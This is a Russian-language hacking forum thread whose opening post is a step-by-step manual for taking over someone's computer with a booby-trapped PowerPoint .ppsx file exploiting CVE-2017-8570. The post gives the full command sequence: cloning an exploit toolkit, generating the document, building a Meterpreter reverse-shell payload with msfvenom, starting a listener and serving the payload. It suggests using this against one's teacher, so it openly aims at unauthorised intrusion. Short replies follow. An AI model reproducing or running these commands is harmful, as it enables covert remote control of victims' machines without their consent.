Актуально Взлом компа через .ppsx (Презентацию)

Тема в разделе "Мануалы", создана пользователем [Senator], 1 сен 2017.

  1. 1 сен 2017 #1
    [Senator]

    [Senator]

    Сообщения:
    90
    Баллы:
    8
    Добра всем, и привет. Давно годных тем по взлому не выкладывал. Решил это исправить.
    Сегодня мы сможем взломать комп без "exe" файла.
    Небольшая история
    Допустим вам нужно хэкнуть своего учителя, и подсунуть ему exe-шник сложновато. И тут на помощь приходит Kali Linux с новым обновлением(обновой metasploit), мы создаем файл похожий на презентацию(Пример: дз.ppsx). И его он с удовольствием откроет.
    Что нам понадобиться:
    1) Kali linux
    2) Metasploit
    3) Знания базовых команд линукс
    Начинаем:
    1) Для начала нужно скачать сам эксплоит
    git clone https://github.com/tezukanice/Office8570
    2) Переходим в скачаную папку
    cd Office8570
    3) Для успешной генерации ppsx файла, нужно создать папку " template " в директории Office8570
    mkdir template
    и в нее перенести файл template.ppsx ( он находиться в папке которую мы скачали )
    cp template.ppsx template/
    4) Половина пути пройдена!!
    Далее нужно создать сам .ppsx файл ⤋⤋⤋( имя презентации меняется здесь )
    python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc
    5) Файл презентации мы сделали, но в него нужно вшить вирус(полезную нагрузку)
    Создадим сам Payload (именно в директории /tmp/ это важно, крч просто не не меняйте команду)
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe

    6) Запускаем слушатель. Он сообщает и получает управление когда жертва открыла файл
    msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run"
    6) Вирус и слушатель готовы. Нужно запускать сам эксплоит-сервер
    python cve-2017-8570_toolkit.py -M exp -e http://xn--80aae0ae0byd/shell.exe -l /tmp/shell.exe
    Как это работает:
    Когда жертва открывает презентацию, то начинает незаметно скачиваться ваш вирус, и после этого автоматически запускает его. Когда это произойдет, в консоли которую мы в 6 пункте откроется сессия и вы сможете управлять компом жертвы.
    [Senator], 1 сен 2017
  2. 12 сен 2017 #2
    SeT_0

    SeT_0

    Сообщения:
    4
    Баллы:
    1
    Kali творит чудеса, видимо?
    SeT_0, 12 сен 2017
  3. 13 сен 2017 #3
    vovean

    vovean

    Сообщения:
    5
    Баллы:
    1
    Правильно понимаю, что для этого нужно порт из команды 5 открыть?
    vovean, 13 сен 2017
  4. 13 сен 2017 #4
    mrash4r

    mrash4r

    Сообщения:
    23
    Баллы:
    1
    С кали линукс шутки плохи

    А ведь есть же метасплоит и на windows (ясен пень на нём сидит большинство участников форума), может сделаешь тему как это делается через Винду?)
    mrash4r, 13 сен 2017

Поделиться этой страницей

Top